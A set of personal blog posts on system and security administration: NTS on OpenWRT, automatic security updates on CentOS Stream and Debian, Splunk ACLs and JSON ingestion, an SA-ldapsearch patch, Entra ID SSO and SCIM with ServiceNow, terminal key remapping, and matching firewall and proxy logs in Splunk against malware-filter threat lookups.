Ming Di Leom's Blog

Configuring NTS in OpenWRT

2024-10-12T00:00:00.000Z

Network Time Security (NTS) is a security extension to the Network Time Protocol (NTP) to provide integrity and authenticity using TLS, and other features. Despite the use of TLS, NTS does not provide confidentiality as the NTP data itself is not encrypted. Other security extension (unrelated to NTP) like DNSSEC also does not provide confidentiality because the DNS data is not encrypted. Even TLS itself is not fully encrypted because Client Hello is still sent in the clear, at least until Encrypted Client Hello is standardised.

Back to OpenWRT, first SSH into the device.

Disable sysntpd so that there is only one NTP client.

service sysntpd stopservice sysntpd disable

Install chrony-nts package, chrony package does not support NTS.

opkg updateopkg install chrony-nts

Disable NTP in chrony.

uci set chrony.@pool[0].disabled='1'uci set chrony.@dhcp_ntp_server[0].disabled='1'

Add NTS servers, preferably at least two and they are geographically close.

uci set chrony.cloudflare='server'uci set chrony.cloudflare.hostname='time.cloudflare.com'uci set chrony.cloudflare.iburst='yes'uci set chrony.cloudflare.nts='yes'uci set chrony.netnod='server'uci set chrony.netnod.hostname='nts.netnod.se'uci set chrony.netnod.iburst='yes'uci set chrony.netnod.nts='yes'

Commit the changes and restart the daemon.

uci commit chronyservice chronyd restart

Verify the config.

cat /etc/config/chronyconfig pool  option hostname '2.openwrt.pool.ntp.org'  option maxpoll '12'  option iburst 'yes'  option disabled 'yes'config dhcp_ntp_server  option iburst 'yes'  option disabled 'yes'config server cloudflare  option hostname 'time.cloudflare.com'  option iburst 'yes'  option nts 'yes'config server netnod  option hostname 'nts.netnod.se'  option iburst 'yes'  option nts 'yes'config allow  option interface 'lan'config makestep  option threshold '1.0'  option limit '3'config nts  option rtccheck 'yes'  option systemcerts 'yes'

Lastly, highly recommend to hardcode the IP address of the chosen NTP servers into “/etc/hosts”, especially when using DNSSEC-validating DNS client, to avoid unresolvable NTS domains when the time is not correct.

CentOS Stream does not support dnf-automatic security updates

2024-07-15T00:00:00.000Z

If you have configured dnf-automatic to only apply security updates on CentOS Stream, it will not install any updates.

/etc/dnf/automatic.conf
[commands]upgrade_type = security

Background §

I discovered this limitation when attempting to patch openssh against CVE-2024-6387 (regreSSHion). Here’s a brief timeline of patch availability on CentOS Stream 9:

1 Jul 2024: CVE-2024-6387 made public
3 Jul 2024: Patch available for RHEL 9 through openssh-8.7p1-38.el9_4.1.
4 Jul 2024: CentOS Stream 9 merged the patch
8 Jul 2024: Patch available through openssh-8.7p1-42.el9

While waiting for the patch availability, I enabled dnf-automatic and configured it to apply security updates only. When the patch openssh-8.7p1-42.el9 was finally available, I checked whether it has been applied using dnf info openssh. It showed the installed version is still 8.7p1-41 and 8.7p1-42 is available. That did not look good. Did I forgot to enable dnf-automatic? systemctl status dnf-automatic.timer showed it is enabled. Did it trigger dnf-automatic.service?

journalctl -r -u dnf-automatic.service
Jul 9 06:15:03 localhost dnf-automatic[12345]: No security updates needed, but 3 updates available

Not only dnf-automatic did not install 8.7p1-42, it also did not see the version as a security update. Before I went on to search for answer, I applied the patch first dnf upgrade openssh.

updateinfo.xml §

RedHat documentation mentions installed security updates can be listed through dnf updateinfo list security --installed, however it returned empty on CentOS Stream 9. To check if the command actually works, I ran it on an AlmaLinux box and it returned similar output as the RedHat documentation.

I then learned that dnf depends on errata to be able to detect whether a package version is a security update. From this post (archived), I discovered errata is published on the repository in the form of updateinfo.xml, which is related to dnf updateinfo.

I remembered when dnf attempts to refresh a repository, the first thing it looks for is /repodata/repomd.xml. So, I tried to look for updateinfo.xml in /repodata/ but could not find it. This explained the empty output of dnf updateinfo but I wasn’t convinced yet. I searched it in AlmaLinux and found {sha256sum-hash}-updateinfo.xml.gz. Since the content is updated constantly, how does dnf know which updateinfo.xml to grab? I opened up the repomd.xml and noticed

<data type="updateinfo">  <location href="repodata/{sha256sum-hash}-updateinfo.xml.gz"/>data>

I also searched and discovered updateinfo is also available on Rocky Linux, Oracle Linux and Fedora. Looking at Fedora’s [repomd.xml], I learned that the updateinfo.xml can be available in gzip, xzip and zchunk (updateinfo_zck) formats. By then, I was sure that dnf cannot apply security (nor bugfix/feature)-specific updates in CentOS Stream.

CentOS used to have updateinfo prior to CentOS 7; after it was removed in CentOS 7, there was a third-party repository that filled the gap but it never supported CentOS Stream.

Enable automatic updates §

Automatic updates only works in CentOS Stream with this config:

/etc/dnf/automatic.conf
[commands]upgrade_type = defaultapply_updates = yes

Automatic security-only updates are available on RHEL, AlmaLinux, Rocky Linux, Oracle Linux and Fedora. Fedora’s updateinfo does not include a CVE reference (e.g. ), thus unable to filter by CVE ID (dnf updateinfo list --cve CVE-2024-6387 --installed).

Unattended upgrades in Debian/Ubuntu §

Automatic updates is provided by the unattended-upgrades package which is installed by default, but not enabled. It can be configured through “/etc/apt/apt.conf.d/50unattended-upgrades”.

/etc/apt/apt.conf.d/50unattended-upgrades
Unattended-Upgrade::Allowed-Origins {  "${distro_id}:${distro_codename}";  "${distro_id}:${distro_codename}-security";};

Each allowed origin refers to a distribution/component; in Ubuntu 24.04, those two lines refer to 24.04:noble and 24.04:noble-security. The default config effectively applies security updates only, though it is not obvious at first. noble is the base repository of Ubuntu 24.04 once it reached general availability. Security updates are available in noble-security while bugfix updates are available in noble-updates instead.

In Debian, the config is different.

/etc/apt/apt.conf.d/50unattended-upgrades
Unattended-Upgrade::Allowed-Origins {  "origin=Debian,codename=${distro_codename},label=Debian";  "origin=Debian,codename=${distro_codename},label=Debian-Security";};

Security updates are published to a different uri debian-security instead of the primary uri debian. A notable implication is that not every Debian mirror mirrors debian-security.

To enable unattended upgrades, dpkg-reconfigure --priority=low unattended-upgrades, select yes and it will create “/etc/apt/apt.conf.d/20auto-upgrades”.

/etc/apt/apt.conf.d/20auto-upgrades
APT::Periodic::Update-Package-Lists "1";APT::Periodic::Unattended-Upgrade "1";

Applying default-deny ACL in Splunk app

2024-02-24T00:00:00.000Z

When I first started creating custom Splunk app, I had an incorrect understanding of access control list (ACLs) configured using default.meta.conf (located at app_folder/metadata/default.meta) whereby I could grant read access to a role like this:

[]access = read : [ roleA ], write : [ ][lookups/lookupB.csv]access = read : [ roleA, roleB ], write : [ ]

Or like this:

[]access = read : [ roleA ], write : [ ][lookups]access = read : [ roleA, roleB ], write : [ ]

None of the above configs will grant roleB read access to lookupB.csv. For the rest of this discussion, we assume that roleB should have access to lookupB.csv only.

# Interaction of ACLs across app-level, category level, and specific object configuration:- To access/use an object, users must have read access to:  - the app containing the object  - the generic category within the app (for example, [views])  - the object itself- If any layer does not permit read access, the object will not be accessible.

For brevity, this article will only discuss about read access which has slightly different interaction of ACLs compared to write access. Don’t worry, once you understood read access, it’s much easier to understand write access.

Notice a role must at least have read access to the app. The simplest way to grant roleB read access is,

[]access = read : [ roleA, roleB ], write : [ ]

While the above config is effective, but it does not meet the access requirement: roleB is granted read access to every objects in that app.

roleB can be restricted as such:

[]access = read : [ roleA, roleB ], write : [ ][lookups/lookupA.csv]access = read : [ roleA ], write : [ ][lookups/lookupB.csv]access = read : [ roleA, roleB ], write : [ ][lookups/lookupC.csv]access = read : [ roleA ], write : [ ]

It is effective and meets the requirement, but there is an issue. Every new lookup/object will now need to specify access = read : [ roleA ], write : [ ] to restrict roleB’s access. This is similar to a default-allow firewall.

Default-deny ACL §

How to implement default-deny ACL? We can achieve it by separating into two apps: appA is accessible to roleA only, appB is accessible to roleA and roleB. Any object we want to share with roleA and roleB, we put it in appB instead.

appA
[]access = read : [ roleA ], write : [ ]

appB
[]access = read : [ roleA, roleB ], write : [ ]

In this approach, every new objects created in appA will not be accessible to roleB because it does not have app access.

Non-removable lookup file §

I noticed lookup files that have object-level ACL, e.g.

[lookups/lookupC.csv]access = read : [ roleA ], write : [ ]

makes it non-removable, even with admin/sc-admin role.

My theory is that the object is non-removable to prevent the ACL from being orphaned. But this theory does not hold, at least for a lookup file that is shipped with an app; deleting a lookup file merely resets its content back to the app’s version. Deleting a lookup file is necessary during an app update that also have updated content of a bundled lookup file. Even when a lookup was never modified, Splunk will keep the content during an app update. Updating an app does not automatically update the bundled lookup, the lookup will only be updated after a delete operation.

Similar limitation (i.e. app update does not update the app’s object) also applies to dashboards. However, there is no way to delete a dashboard xml in Splunk Cloud, so updating a dashboard through app update always require app uninstallation beforehand.

Query LOCKOUT and PASSWORD_EXPIRED flags on Splunk SA-ldapsearch

2023-10-01T00:00:00.000Z

SA-ldapsearch (Splunk Supporting Add-on for Active Directory) has a useful feature that parses “userAccountControl” flags into a multivalue. For example, instead of showing “514”, it shows [ACCOUNTDISABLE, NORMAL_ACCOUNT] instead. However, I noticed LOCKOUT and PASSWORD_EXPIRED flags are not shown even though I was sure the accounts I queried have either of those flags set. Those flags are indeed listed under documentations for “userAccountControl”: Windows Server and Active Directory Schema.

Despite being mentioned in the documentations, in that Windows Server doc, there is a note that says those flags have been moved to “msDS-User-Account-Control-Computed“ attribute since Windows Server 2003. But when I queried that attribute, I got a decimal value which meant the parsing function was not applied.

To apply flag-parsing function on “msDS-User-Account-Control-Computed”:

SA-ldapsearch/bin/packages/app/formatting_extensions.py
'1.2.840.113556.1.4.8':             format_user_flag_enum,         # User-Account-Control'1.2.840.113556.1.4.1460':          format_user_flag_enum,         # ms-DS-User-Account-Control-Computed

First line is an existing one, the second line is the new one.

For the sake of completeness, that function can also be patched to parse other flags of “msDS-User-Account-Control-Computed”. I created a script to apply the following patch directly on “splunk-supporting-add-on-for-active-directory_*.tgz“ and save it to a new app package “SA-ldapsearch_*.tgz”.

--- SA-ldapsearch/bin/packages/app/formatting_extensions.py  2023-09-06 00:00:00.000000000 +0000+++ SA-ldapsearch/bin/packages/app/formatting_extensions.py  2023-09-06 00:00:00.000000001 +0000@@ -721,6 +721,12 @@         names.append('PASSWORD_EXPIRED')     if flags & 0x1000000:         names.append('TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION')+    if flags & 0x2000000:+        names.append('NO_AUTH_DATA_REQUIRED')+    if flags & 0x4000000:+        names.append('PARTIAL_SECRETS_ACCOUNT')+    if flags & 0x8000000:+        names.append('USE_AES_KEYS')     # Zero or one of these flags may be set@@ -822,6 +828,7 @@     '1.2.840.113556.1.4.1303':          format_sid,                    # Token-Groups-No-GC-Acceptable     '1.2.840.113556.1.4.8':             format_user_flag_enum,         # User-Account-Control+    '1.2.840.113556.1.4.1460':          format_user_flag_enum,         # ms-DS-User-Account-Control-Computed     # formatter specially for msExchMailboxSecurityDescriptor     '1.2.840.113556.1.4.7000.102.80' : format_security_descriptor,     # msExchMailboxSecurityDescriptor

Azure AD/Entra ID SSO integration with ServiceNow

2023-08-27T00:00:00.000Z

Single sign-on (SSO) enables a user to access multiple systems using one login. Whenever a user wants to access a system, the system will redirect the user to an identity provider which has an existing account for that user; once the user authenticates with the identity provider successfully, the identity provider will redirect the user back to the system and the user can then access it. The system does not have the user’s password and the identity provider does not share it either.

In an enterprise environment, SSO provides convenience to the staff and several benefits to the enterprise. Three benefits to the enterprise:

Less accounts to create (onboarding), maintain and disable/delete (offboarding).
During offboarding, disabling an account from the identity provider will also revoke access to SSO-enabled systems, thus providing better security.
Identity provider is much more likely to support multi-factor authentication (MFA), enabling more systems to be MFA-secured.

SSO does not necessarily provide better security all the time. Threat actor can utilise a compromised account to access any SSO-enabled system that the account has prior access, leading to wider blast radius. There are three mitigations to reduce such risk:

Enforce MFA to minimise the chance of accounts being compromised.
Limit access to SSO-enabled systems through access control list (ACL).
Enforce conditional access. For example, identity provider can be configured to prompt for second-factor authentication when accessing a sensitive system, even when the user is already logged in using MFA before. Identity provider could also enforce phish-resistant MFA for access to sensitive systems.

SSO in Azure AD §

Configuring a system to utilise Azure Active Directory (AAD)/Entra ID involves setting up SAML and optionally SCIM. SCIM is only used to provision users, SAML can supply the necessary information (email, name, phone, etc) to the SSO-enabled system to create users on-demand upon first login (of that user) and update the user information in subsequent logins. In ServiceNow SAML configuration, under “User Provisioning” tab, on-demand user provision can be enabled by ticking “Auto Provisioning User” and “Update User Record Upon Each Login”.

During the initial SAML setup in ServiceNow, it requires a successful test login (using an AAD account, in this case) before SSO can be activated. This will fail if the user does not exist in ServiceNow yet. To pass it, simply create a new ServiceNow user that has the same email as the test AAD account. If you are confident the SAML setting is correct, the test login can be made optional. It is easier to utilise the “Automatically configure ServiceNow” option because it will also configure the transform mapping in ServiceNow which enables it to map SAML attributes (emailaddress, name, etc) to the respective ServiceNow’s sys_user table columns.

In SAML configuration, AAD uses the “user.userprincipalname” (UPN) attribute as the unique user identifier. UPN is usually equivalent to the email address, so the AAD guide recommends to change the user identifier to “email” in ServiceNow’s Multi-Provider SSO. However, it is possible for UPN to be different to email and will prevent affected users from accessing ServiceNow. UPN or email is also not immutable, a user may change their email to reflect a name change. This can results in duplicate users, if “Auto Provisioning User” is enabled in ServiceNow.

Even though SCIM can avoid duplicates, users with a recently changed email may still face access issue for a while because AAD SCIM is not real-time and each sync can take up to 30 minutes, longer if the attribute is sourced from on-premise AD (which will needs to be synced-up to AAD using AD Connect, and then to ServiceNow using SCIM).

To avoid this issue, there are three choices of source attribute that are immutable, each of them is suitable as a unique user identifier in SAML. They do not map with existing ServiceNow sys_user columns, so you will need a new column and a new mapping in the transform map.

user.objectid: for AAD-only environment.
user.onpremisesimmutableid: refers to GUID. AAD uses this attribute as the primary key to identify on-premise AD user.
user.onpremisesecurityidentifier: refers to SID, may not necessarily synced-up to AAD.

SCIM §

With on-demand user provision, it is possible to use SAML without SCIM. However, since a user is only created after the initial SSO login, user lookup will be limited. For example in ServiceNow, a support staff will not be able to enter the “this incident affects user X” field if that user has never login to ServiceNow before. SCIM can provision all users found in an identity provider into a target system. It is also possible to provision based on conditions, such as to exclude generic or service accounts.

Prior to configuring SCIM in ServiceNow, it is essential to disable SAML on-demand user provision “Auto Provisioning User” and “Update User Record Upon Each Login”. This is to avoid SAML-sourced attribute from overwriting SCIM’s in sys_user table, because SAML mapping does not necessarily match SCIM’s.

In AAD SCIM, the default primary mapping is userPrincipalName → user_name with user_name being set as the primary key (Show advanced options → Edit attribute list for ServiceNow). A mapping is considered as primary when it has “Match objects using this attribute“ enabled and has the lowest value in “Matching precedence”. “Match objects…” is to configure SCIM to utilise a mapping to check existence of each user, i.e. provision a user in the target system if it does not exist. Multiple mappings can be used in different order, in case a source attribute is empty. At least one mapping must have “Match objects…” enabled.

user	employeeId (AAD)	mail (AAD)	employee_number (SNow)	email (SNow)
A	123	empty	123	empty
B	empty	b@example.com	empty	b@example.com

What if user B has employeeId later on? There is a (unconfirmed) possibility that it can results in duplicate user B in the target system.

user	employeeId (AAD)	mail (AAD)	employee_number (SNow)	email (SNow)
A	123	empty	123	empty
B	456	b@example.com	empty	b@example.com
B (duplicate in SNow)	456	b@example.com	456	b@example.com

This can be avoided by using a mandatory and immutable AAD attribute. Similar to the three options mentioned in the previous section, they are:

objectId
immutableId
onPremisesSecurityIdentifier

Steps to configure:

In ServiceNow, add a new column in sys_user ServiceNow table.
In AAD SCIM, Show advanced options → Edit attribute list for ServiceNow, add a new attribute with the same name as configured in previous step. Tick “Required” and “Primary”, untick “Primary” in existing attribute (usually “user_name”).
Add a new mapping with “Match objects” enabled.
Disable it in existing mapping (usually “userPrincipalName → user_name”).
Save

Single-space value §

An interesting issue I encountered which was ultimately caused by an AAD attribute that had a value of just a single space. I initially configured a SCIM mapping as follow: Coalesce([attributeA], [attributeB]) -> u_column_z where Coalesce() returns the first non-empty attribute. I knew attributeB is never empty, however somehow some users had (blank) value in their “u_column_z” field.

I fired up the Expression Builder in AAD SCIM and tried Coalesce([attributeA], [attributeB]) on one of the affected users. It returned “Your expression is valid, but your expression evaluated to an empty string”. Tried ToUpper([attributeA]), same. Tried IsNullorEmpty([attributeA]), got “false”. If an attribute has empty value, it will return “null”. So, this meant attributeA is not empty. But what could it be?

IIF([attributeA]=" ", "space", "no space")space

AAD SCIM trims any leading and trailing whitespaces in the output, similar to trim() JavaScript method.

Aside from an obvious fix by removing that space in AAD, a workaround like “Coalesce(Trim([attributeA]), [attributeB])” works too.

Mapping Ctrl+H to Backspace in terminal emulator

2023-07-17T00:00:00.000Z

A few months ago, there was an article which encouraged Linux users to use more readline keyboard shortcuts. readline keyboard shortcuts are based on Emacs keybindings, while also support switching to vi keybindings. At that time, I was only familiar with Ctrl+a (line start) and Ctrl+e (line end). Interested to learn more tricks, I went on search for a cheatsheet and found this. I then added two missing shortcuts (Ctrl+h & Ctrl+d), printed it out and stick it to my desk.

However there were two shortcuts which did not work as intended: Ctrl+h and Ctrl+Backspace. The first one is supposed to be equivalent to backspace, but it was deleting previous word just like Ctrl+Backspace or Ctrl+w. The second one did not work on PowerShell’s Emacs mode.

While looking for a workaround for other terminal and shell, I find it helpful to remember these two facts so that you can stay on the right track.

$TERM does not refer to the terminal emulator
Shell does not recognise Ctrl+Backspace

$TERM is not the terminal emulator §

In Kitty, $TERM is “xterm-kitty”; most other Linux terminals output it as “xterm-256color”. The value actually refers to the “terminfo“ being used and not the terminal emulator.

Shell does not recognise Ctrl+Backspace §

When Ctrl+Backspace is pressed, a terminal emulator either sends “^?” or “^H” control character to the shell, which then initiate an action (e.g. “backward-kill-word”).

“^[character]“ is first and foremost a caret notation of a control character, a friendlier representation of hexadecimal, much like hexadecimal is a nicer representation of binary. “^H” actually means control-code-8 (H is the eighth letter), instead of representing Ctrl+h. “^H” can be entered using Ctrl+h simply because it is more practical than having a dedicated key for each control character on a keyboard.

Remap Ctrl+h to ^? §

Most terminal emulators map Backspace to “^?” and Ctrl+Backspace to “^H”. Since Ctrl+h is also mapped to “^H”, thus sharing a similar action (“backward-kill-word”) with Ctrl+Backspace. The easiest fix is to remap Ctrl+h to “^?”. This approach only needs to configure the terminal emulator.

To check which control character is mapped to:

$ showkey -a# backspace^?   127 0177 0x7f# ctrl+ backspace^H    8 0010 0x08

kitty §

map ctrl+h send_text normal \x7f

Add the above line to the end of “$HOME/.config/kitty/kitty.conf”. “7f” is the hex of “^?”.

Press Ctrl+Shirt+F5 to reload the config and run showkey -a to verify Ctrl+h has been remapped.

$ showkey -a# ctrl+h^?   127 0177 0x7f

Windows Terminal §

Go Settings → Open JSON file which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under "actions" list, append the following object.

{  "command": {    "action": "sendInput",    "input": "\u007F"  },  "keys": "ctrl+h"}

Map Ctrl+Backspace to backward-kill-word §

Ctrl+Backspace does not work as expected when I switch the PowerShell’s edit mode to Emacs Set-PSReadLineOption -EditMode Emacs, even though it works in the default Cmd mode. This is because PowerShell binds it to BackwardDeleteChar in Emacs mode. Somehow I could not remap it to “^H” (\b).

Some xterm users also have this issue and a workaround is by mapping it to an unused escape sequence, then bind it to backward-kill-word in the shell. While Windows Terminal supports sending an escape sequence, the corresponding binding is not supported in PowerShell. Instead of using escape sequence, let’s use a unicode character, specifically a character within the range of private use area (U+E888-U+F8FF) to avoid conflict with existing characters. I choose U+E888 for this example.

Anyhow, it is only a tiny issue for me since I can always use Ctrl+w.

Windows Terminal §

Go Settings → Open JSON file which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under "actions" list, append the following object.

{  "command": {    "action": "sendInput",    "input": "\uE888"  },  "keys": "ctrl+backspace"}

PowerShell §

$PROFILE
Set-PSReadLineKeyHandler -Chord "`u{E888}" -Function BackwardKillWord

The following Windows Terminal + PowerShell configs did not work for me. Windows Terminal did yield the correct control character, but somehow PowerShell could not recognise it.

{  "command": {    "action": "sendInput",    "input": "\u007F"  },  "keys": "backspace"},{  "command": {    "action": "sendInput",    "input": "\b"  },  "keys": "ctrl+backspace"}

$PROFILE
Set-PSReadLineKeyHandler -Chord "`u{007F}" -Function BackwardDeleteCharSet-PSReadLineKeyHandler -Chord "`b" -Function BackwardKillWord

zsh §

$HOME/.zshrc
bindkey '\uE888' backward-kill-word

bash §

$HOME/.bashrc
bind '"\uE888":backward-kill-word'

Configure Splunk Universal Forwarder to ingest JSON files

2023-06-17T00:00:00.000Z

The recommended logging format according to Splunk best practice looks like this:

example.log
{ "datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3" }

Each event is in JSON, not the file.
- This also means the log file is not a valid JSON file.
Each event is separated by newline.

The format can be achieved by exporting live event in JSON and append to a log file. However, I encountered a situation where the log file can only be generated by batch. Exporting the equivalent of the previous “example.log” in JSON without string manipulation looks like this:

example.json
[{"datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3"}]

I will detail the required configurations in this post, so that Splunk is able to parse it correctly even though “example.json” is not a valid JSON file.

UF inputs.conf §

$SPLUNK_HOME/etc/deployment-apps/foo/local/inputs.conf
[monitor:///var/log/app_a]disabled = 0index = index_namesourcetype = app_a_event

monitor directive is made up of two parts: monitor:// and the path, e.g. /var/log/app_a. Unlike most Splunk configs, this directive does’t require the backslash (used in Windows path) to be escaped, e.g. monitor://C:\foo\bar.

A path can be a file or a folder. When (*) wildcard matching is used to match multiple folders, another wildcard needs to be specified again to match files in those matched folders. The wildcard works for a single path segment only. For example, to match all the following files, use monitor:///var/log/app_*/*. Splunk also supports “…” for recursive matching.

/var/log/├── app_a│   ├── 1.log│   ├── 2.log│   └── 3.log├── app_b│   ├── 1.log│   ├── 2.log│   └── 3.log└── app_c    ├── 1.log    ├── 2.log    └── 3.log

Specify an appropriate value in sourcetype config, the value will be the value of sourcetype field in the ingested events under the “monitor” directive. Take note of the value you have configured, it will be used in the rest of configurations.

Forwarder props.conf §

props.conf
[app_a_event]description = App A logsINDEXED_EXTRACTIONS = JSON# separate each object into a lineLINE_BREAKER = }(,){\"datetime\"# a line represents an eventSHOULD_LINEMERGE = 0TIMESTAMP_FIELDS = datetimeTIME_FORMAT = %s## default is 2000# MAX_DAYS_AGO = 3560

The directive name should be the sourcetype value specified in the inputs.conf. The following configs apply to the universal forwarder is because INDEXED_EXTRACTIONS is used.

LINE_BREAKER: Search for string that matches the regex and replace only the capturing group with newline (\n). This is to separate each event into separate line.
- }(,){\"datetime\" searches for },{"datetime" and replaces “,” with “\n”.
SHOULD_LINEMERGE: only used for event that spans multiple lines. In this case, it’s the reverse, the log file has all events in one line.
TIMESTAMP_FIELDS: Refers to datetime key in the example.json.
MAX_DAYS_AGO (optional): Specify the value if there are events older than 2,000 days.
TIME_FORMAT: Optional if Unix time is used, but recommended to specify whenever possible. When Unix time is used, it is not necessary to specify %s%3N when there is subsecond.

The location of “props.conf” depends on whether the universal forwarder is centrally managed by a deployment server.

Path A: $SPLUNK_HOME/etc/deployment-apps/foo/local/props.conf
Path B: $SPLUNK_HOME/etc/apps/foo/local/props.conf

If there is a deployment server, then the config file should be in path A, in which the server will automatically deploy it to path B in the UF. If the UF is not centrally managed, it should head straight to path B.

Search head props.conf §

props.conf
[app_a_event]description = App A logsKV_MODE = noneAUTO_KV_JSON = 0SHOULD_LINEMERGE = 0

Since index-time field extraction is already enabled using INDEXED_EXTRACTIONS, search-time field extraction is no longer necessary. If KV_MODE and AUTO_KV_JSON are not disabled, there will be duplicate fields in the search result.

In Splunk Enterprise, the above file can be saved in a custom app, e.g. “$SPLUNK_HOME/etc/app/custom-app/default/props.conf”

For Splunk Cloud deployment, the above configuration can be added through a custom app or Splunk Web: Settings > Source types.

Ingesting API response §

It is important to note SEDCMD runs after INDEXED_EXTRACTIONS. I noticed this behaviour when I tried to ingest API response of LibreNMS.

{"status": "ok", "devices": [{"device_id": 1, "key1": "value1", "key2": "value2"}, {"device_id": 2, "key1": "value1", "key2": "value2"}, {"device_id": 3, "key1": "value1", "key2": "value2"}], "count": 3}

In this scenario, I only wanted to ingest “devices” array where each item is an event. The previous approach not only did not split the array, but “status” and “count” fields still existed in each event despite the use of SEDCMD to remove them.

The solution is not to use INDEXED_EXTRACTIONS (index-time field extraction), but use KV_MODE (search-time field extraction) instead. INDEXED_EXTRACTIONS is not enabled so that SEDCMD works more reliably. If it’s enabled, the JSON parser can unpredictably split part of the prefix (in this case {"status": "ok", "devices": [) or suffix into separate events and SEDCMD does not work across events. SEDCMD does work with INDEXED_EXTRACTIONS, but you have to make sure the replacement is within an event

props.conf
# heavy forwarder or indexer[api_a_response]description = API A response# remove bracket at the start and end of each lineSEDCMD-remove_prefix = s/^\{"status": "ok", "devices": \[//gSEDCMD-remove_suffix = s/\], "count": [0-9]+\}$//g# separate each object into a lineLINE_BREAKER = }(, ){\"device_id\"# if each line/event is very long# TRUNCATE = 0# a line represents an eventSHOULD_LINEMERGE = 0

props.conf
# search head[api_a_response]description = API A responseKV_MODE = jsonAUTO_KV_JSON = 1

Malicious website detection on Splunk using malware-filter

2023-04-16T00:00:00.000Z

Splunk Add-on for malware-filter includes the following CSV files:

botnet-filter-splunk.csv
botnet_ip.csv
opendbl_ip.csv
phishing-filter-splunk.csv
pup-filter-splunk.csv
urlhaus-filter-splunk-online.csv
vn-badsite-filter-splunk.csv

These CSV files can be used as lookups to find potentially malicious traffic. They contain a list of bad IPs/domains/URLs and we are going to look for those values in the events.

We can view the content of a lookup file by using inputlookup. When using that command, there should always be a leading pipe character “|” because it is an event-generating command.

Lookup file locations §

Lookup file can be uploaded via Splunk Web or creating the file in the following locations:

$SPLUNK_HOME/etc/users///lookups/
$SPLUNK_HOME/etc/apps//lookups/
$SPLUNK_HOME/etc/system/lookups/

In Splunk Web, setting the permission to app-sharing or global-sharing will automatically moves the file to the second or third location respectively. Uploaded lookup file can be used straight away without having to reload app or restart Splunk, regardless of which way it was created.

inputlookup basics §

| inputlookup botnet_ip.csv

_time field is omitted for brevity.

first_seen_utc	dst_ip	dst_port	c2_status	last_online	malware	updated
2021-05-16 19:49:33	1.2.3.4	1234	online	2023-03-05	Lorem	2023-03-04T16:41:17Z

The output is no different to any other event, we can specify which fields to be displayed and then rename the fields.

| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst

dst
178.128.23.9

Search for specific events §

Example firewall events:

index=firewall

src	src_port	dst	action
192.168.1.5	45454	1.2.3.4	allowed
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	7.7.5.5	allowed

Notice the second row’s dst value matches dst_port value of the example lookup table shown in the previous section.

To match for dst value of the firewall events and dst_ip of the lookup file, use a subsearch with inputlookup. In this example, the subsearch extracts only the dst_ip field and rename it to dst in order to match the same field in the firewall events.

index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]

src	src_port	dst	action
192.168.1.5	45454	1.2.3.4	allowed

To display events in table format, append | table *

Wildcard §

Asterisk character (*) in the lookup file does work as a wildcard.

index=proxy

src	url	dst_port
192.168.1.5	foo.com/path1	443
192.168.1.3	foo.com/path2	443
192.168.1.4	bar.com/path3	443

The lookup files do not include wildcard affix.

| inputlookup urlhaus-filter-splunk-online.csv

host	path	message	updated
foo.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z

The add-on includes geturlhausfilter command along with other commands to update their respective lookup file. Those commands has wildcard_suffix argument to append wildcard to the field’s values.

| geturlhausfilter wildcard_suffix=host| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv

host	path	message	updated	host_wildcard_suffix
foo.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z	foo.com*

index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_suffix | rename host_wildcard_suffix AS url ]

src	url	dst_port
192.168.1.5	foo.com/path1	443
192.168.1.3	foo.com/path2	443

Wildcard prefix §

Previous section showed an example using wildcard suffix (“foo.com*“). Wildcard also works as a prefix (“*foo.com”) or even in the middle (“f*o.com”), though these are discouraged.

index=proxy

src	domain	dst_port
192.168.1.5	foo.com	443
192.168.1.3	lorem.foo.com	443
192.168.1.4	bar.com	443

| geturlhausfilter wildcard_prefix=host| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv

host	path	message	updated	host_wildcard_prefix
foo.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z	*foo.com

index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_prefix | rename host_wildcard_prefix AS domain ]

src	domain	dst_port
192.168.1.5	foo.com	443
192.168.1.3	lorem.foo.com	443

Matching multiple fields §

File hosting services like Google Docs and Dropbox are commonly abused to host phishing website. For those sites, the lookup should match both domain and path. When specifying more than one field in fields command, all fields will be matched using AND condition.

index=proxy

src	domain	path
192.168.1.5	foo.com	document1.html
192.168.1.3	foo.com	document2.html
192.168.1.4	foo.com	document3.html

| inputlookup urlhaus-filter-splunk-online.csv

host	path	message	updated
foo.com	document1.html	urlhaus-filter malicious website detected	2023-03-13T00:11:20Z

index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]

src	domain	path
192.168.1.5	foo.com	document1.html

Matching individual and multiple fields §

A lookup file may have rows with empty path to denote a domain should be blocked regardless of paths, while also having rows with both domain and path to denote a specific URL should be blocked instead. The syntax is the same as what was shown in the previous section because Splunk will only match non-empty values, empty values will be ignored instead.

index=proxy

src	domain	path
192.168.1.5	bad-domain.com	lorem-ipsum.html
192.168.1.3	bad-domain.com	foo-bar.html
192.168.1.4	docs.google.com	malware.exe
192.168.1.4	docs.google.com	safe.doc

| inputlookup urlhaus-filter-splunk-online.csv

host	path	message	updated
bad-domain.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z
docs.google.com	malware.exe	urlhaus-filter malicious website detected	2023-03-13T00:11:20Z

